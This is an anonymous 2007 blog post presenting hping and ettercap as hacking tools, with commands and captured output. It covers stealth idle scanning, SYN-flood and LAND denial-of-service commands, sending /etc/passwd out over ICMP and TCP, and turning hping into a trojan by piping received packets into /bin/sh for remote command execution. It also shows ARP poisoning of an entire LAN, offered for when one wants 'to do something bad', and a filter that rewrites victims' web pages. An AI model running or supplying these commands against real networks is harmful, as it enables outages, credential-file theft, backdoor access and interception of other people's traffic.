Monday, May 14, 2007

  • Hacking Tools and how to use them

Using HPING:__

1. HPing as port scanner: 

[root@localhost root]#hping -I eth0 -S 10.17.139.104 -p 80
len=46 ip=192.168.10.1 flags=SA DF seq=0 ttl=64 id=11101 win=16080
rtt=2.7 ms
flags=SA means port is open
flags=RA means port is closed

2. Check sequentially: 

[root@localhost root]# hping -I eth0 -S 192.168.10.1 -p ++79
HPING 192.168.10.1 (eth0 192.168.10.1): S set, 40 headers + 0 data
bytes
len=46 ip=192.168.10.1 sport=79 flags=RA seq=0 ttl=255 id=17491 win=0
rtt=2.4 ms
len=46 ip=192.168.10.1 sport=80 flags=SA DF seq=1 ttl=64 id=17492
win=16080 rtt=3.1 ms
len=46 ip=192.168.10.1 sport=81 flags=RA seq=2 ttl=255 id=17493 win=0
rtt=1.7 ms

3. Idle scanning:

  • Idle scanning needs a silent host, that has predictable "id" value in packets that are replied for an icmp ping. The victim's box is scanned by using this idle host as the source, and victim's ip as the destination. The idle host is scanned by this host and the "id" value is checked, to find out whether the particular port is open or not. This is anonymous scanning:

Identifying idle machine: 

[root@localhost root]# hping -I eth0 -SA 
len=46 ip=192.168.10.1 flags=R seq=0 ttl=255 id=18106 win=0 rtt=0.4 ms
len=46 ip=192.168.10.1 flags=R seq=1 ttl=255 id=18107 win=0 rtt=0.4 ms
len=46 ip=192.168.10.1 flags=R seq=2 ttl=255 id=18108 win=0 rtt=0.4 ms

Scanning the victim box with idle machine as the source:

First run the following command on the victim's box 

[root@localhost root]# hping -I eth0 -a 192.168.10.1 -S 192.168.10.33
-p ++20

Then scan the idle machine using this: 

[root@localhost docs]# hping -I eth0 -r -S 192.168.10.1 -p 2000
len=46 ip=192.168.10.1 flags=RA seq=88 ttl=255 id=+1 win=0 rtt=1.8 ms
len=46 ip=192.168.10.1 flags=RA seq=89 ttl=255 id=+1 win=0 rtt=1.7 ms
len=46 ip=192.168.10.1 flags=RA seq=90 ttl=255 id=+1 win=0 rtt=1.8 ms
len=46 ip=192.168.10.1 flags=RA seq=91 ttl=255 id=+2 win=0 rtt=1.4 ms
(port 25)
id=+2 indicates particular port is open (here it is port 25)

4. Traceroute using any port in HPing: 

[root@localhost root]# hping -I eth0 -z -t 6 -S mail.test.com -p 143
HPING mail.test.com (eth0 10.5.5.3): S set, 40 headers + 0 data bytes
TTL 0 during transit from ip=10.1.5.3
7: TTL 0 during transit from ip=10.1.5.3
8: TTL 0 during transit from ip=10.2.5.3
9: TTL 0 during transit from ip=10.3.5.3
10: TTL 0 during transit from ip=10.4.5.3
11: TTL 0 during transit from ip=10.6.5.3
once you reach the server ...
len=46 ip=10.5.5.3 flags=SA DF seq=33 ttl=47 id=0 win=5840 rtt=4341.3
ms

5. SYN DOS: 

[root@localhost root]# hping -I eth0 -a  -S 
-p 80 -i u1000

6. LAND Attack:

A LAND attack was and still is a quite famous DOS attack that was quite effective on Windows NT in the old days. The aim of the attack is to construct a packet that connects a socket to it self. This ended up in using a lot of resources on the OS, causing a DOS. 

[root@localhost root]# hping -S -a 10.10.10.10 -p 21 10.10.10.10
HPING 10.10.10.1 (eth0 10.10.10.1): S set, 40 headers + 0 data bytes

7. Packets with signatures. Up to now, we simply created packets, in fact IP/TCP headers. In the next example, a data payload is used. The examples shows how we can ‘misuse’ UDP services. This is a simple non-dangerous example, but I leave up to the imagination. Simply create a file containing a signature (Buffer Overflow, ...) 

[root@localhost root]# cat /root/signature.sig
""BUFFER OVERFLOW""
[root@localhost root]#
What are we doing ?
The –2 switch will put hping is UDP mode, the –d switch specifies the
length of the data portion and together with the –E switch, the
signature is read from specified file.
[root@localhost rules]# hping -2 -p 7 192.168.10.33 -d 50 -E
/root/signature.sig
HPING 192.168.10.33 (eth0 192.168.10.33): udp mode set, 28 headers + 50
data bytes
len=78 ip=192.168.10.33 seq=0 ttl=128 id=24842 rtt=4.9 ms
len=78 ip=192.168.10.33 seq=1 ttl=128 id=24844 rtt=1.6 ms
len=78 ip=192.168.10.33 seq=2 ttl=128 id=24846 rtt=1.0 ms
--- 192.168.10.33 hping statistic ---
3 packets tramitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 1.0/2.5/4.9 ms
[root@localhost rules]#
[root@localhost root]# tcpdump -i eth0 -nX proto 17
tcpdump: listening on eth0
16:56:20.955167 192.168.10.44.1581 > 192.168.10.33.echo: udp 50
0x0000   4500 004e 1220 0000 4011 d2e1 c0a8 0a2c        E..N....@......,
0x0010   c0a8 0a21 062d 0007 003a db41 2222 4255        ...!.-...:.A""BU
0x0020   4646 4552 204f 5645 5246 4c4f 5722 220a        FFER.OVERFLOW"".
0x0030   0a00 0000 0000 0000 0000 0000 0000 0000        ................
0x0040   0000 0000 0000 0000 0000 0000 0000             ..............
16:56:20.960147 192.168.10.33.echo > 192.168.10.44.1581: udp 50
0x0000   4500 004e 5ec0 0000 8011 4641 c0a8 0a21        E..N^.....FA...!
0x0010   c0a8 0a2c 0007 062d 003a db41 2222 4255        ...,...-.:.A""BU
0x0020   4646 4552 204f 5645 5246 4c4f 5722 220a        FFER.OVERFLOW"".
0x0030   0a00 0000 0000 0000 0000 0000 0000 0000        ................
0x0040   0000 0000 0000 0000 0000 0000 0000             ..............

8. Transferring files via ICMP, UDP or TCP:

Run the following on the receiving end: 

hping 192.168.10.66 --listen signature --safe --icmp

Run the following on the sending end: 

[root@knoppix root]# hping 192.168.10.44 --icmp –d 100 --sign signature
--file /etc/passwd

TCPDump on receiving end gives: 

tcpdump -nX -i
tcpdump: listening on eth0
15:21:31.271874 192.168.10.66 > 192.168.10.44: icmp: echo request
0x0000   4500 0080 60d9 0000 4001 83e5 c0a8 0a42        E...`...@......B
0x0010   c0a8 0a2c 0800 9df1 cf15 0000 7369 676e        ...,........sign
0x0020   6174 7572 6572 6f6f 743a 783a 303a 303a        atureroot:x:0:0:
0x0030   726f 6f74 3a2f 726f 6f74 3a2f 6269 6e2f        root:/root:/bin/
0x0040   6261 7368 0a64 6165 6d6f 6e3a 783a 313a        bash.daemon:x:1:
0x0050   313a                                           1:

9. Transferring a file via TCP: 

[root@localhost root]# hping 192.168.10.66 --listen signature --safe
-p 22
hping2 listen mode
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[root@knoppix root]hping -p 22 d 100 --sign signature --file
/etc/passwd

This could be a way to create a full duplex channel across a stateless filter. 

[root@localhost root]#hping 192.168.10.66  --listen signature --safe
-p 22
on the other site
[root@knoppix root]hping -SA -22 d 100 --sign signature --file
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[root@localhost root]# tcpdump -nX -i eth0 not host 192.168.10.33
tcpdump: listening on eth0
15:14:49.755553 arp who-has 192.168.10.50 tell 192.168.10.1
0x0000   0001 0800 0604 0001 0008 da10 0e44 c0a8        .............D..
0x0010   0a01 0000 0000 0000 c0a8 0a32 addf d404        ...........2....
0x0020   5010 f834 b458 0000 0101 050a addf             P..4.X........
15:14:57.813503 192.168.10.66.1636 > 192.168.10.44.ssh: S 926334897:926334997(100) ack
1257790585 win 512

10. HPING as a Trojan.

If hping can be started on the remote machine, you could use all the described techniques above to execute commands on the remote machine. An educational example with udp port 53. 

[root@localhost root]# hping 192.168.10.66 --listen signature --safe --
udp -p 53 |/bin/sh
hping2 listen mode
amsn_received                       lib
readme.txt
anaconda-ks.cfg                     libfwbuilder-0.10.13-1.rh7.i386.rpm
report.html
avi                                 license.txt
sbin
CPsrsc-50-02.i386.rpm               linux-wlan-ng-0.1.16-pre5
scripts
...
on the other site
[root@knoppix root]# echo ls >test.cmd
[root@knoppix root]# hping 192.168.10.44 -p 53 -d 100 --udp --sign
siganature --file ./test.cmd

11. Even worse In this example, an apache server is running on a linux server. Somehow (this is for another tutorial) we managed to get hping started as follows. 

[root@localhost root]# hping -I eth0 --listen signature -p 80 |/bin/sh
hping2 listen mode
amsn_received                       fwbuilder-pf-1.0.9-1.rh7.i386.rpm
nmap.txt           signature.sig
anaconda-ks.cfg                     install.log
nsmail             snmpd.txt
...                                 scripts
on the other machine ...
With a simple netcat, we do the following. The command behind the
signature will be executed on the server, without crashing the services
or interfering.
[root@knoppix root]# echo "signaturels;" | nc 192.168.10.44 80


501 Method Not Implemented

Method Not Implemented

siganutels; to /index.html not supported.

Invalid method in request siganutels;


Apache/1.3.27 Server at localhost.localdomain Port
80


[root@localhost root]#
Using Ettercap

1. ARP Poisoning with Remote Browser plugin: 

ettercap -T -Q -M arp:remote -i wlan0 /10.10.10.23/ // -P remote_browser

Perform  the  ARP  poisoning  against  the  gateway  and the host in the lan between 2 and 10. The ’remote’ option is needed to be able to sniff the remote traffic the hosts make              through the gateway.

ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/

2. How to discover Gateway using Ettercap: 

Run ettercap and type p to load plugins. Then load the following plugin:

gw_discover

3. How to use NMAP to identify active hosts: 

root@box:~# nmap -sP 10.10.10.*

4. How to identify whether ARP cache of victim has been poisoned or not: 

Use plugin chk_poison. By now you must be knowing how to use plugins

5. Scan connections between two hosts: 

ettercap -Ts 192.168.0.1 192.168.0.2

6. Use broadcast ping to scan the LAN: 

ettercap -b

7. Scan packets entering or leaving a host at port 21,22 and 23: 

ettercap -Ts /10.0.0.1/21,22,23

8. You are fedup of your team, and you really want to do something bad: 

ettercap -T -M arp // //

9. A little advanced technique. How to trick another person's browser activities !

This one does not work with proxy enabled (Unfortunate)

i. Write the following into a file called ig.filter. Remember to replace "img src" with just "src" in the case of ESX Server's index page redirection !!! 

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"your own path to your own jpg\" ");
   replace("IMG SRC=", "img src=\"your own path to your own jpg\" ");
   msg("Filter Ran.\n");
}

ii. Compile it using etterfilter as follows: 

etterfilter ig.filter -o ig.ef

iii. Then what else ! Run it !!! 

ettercap -T -q -F ig.ef -M ARP /10.17.139.104/ //


posted by Anonymous at 10:06 PM 0 comments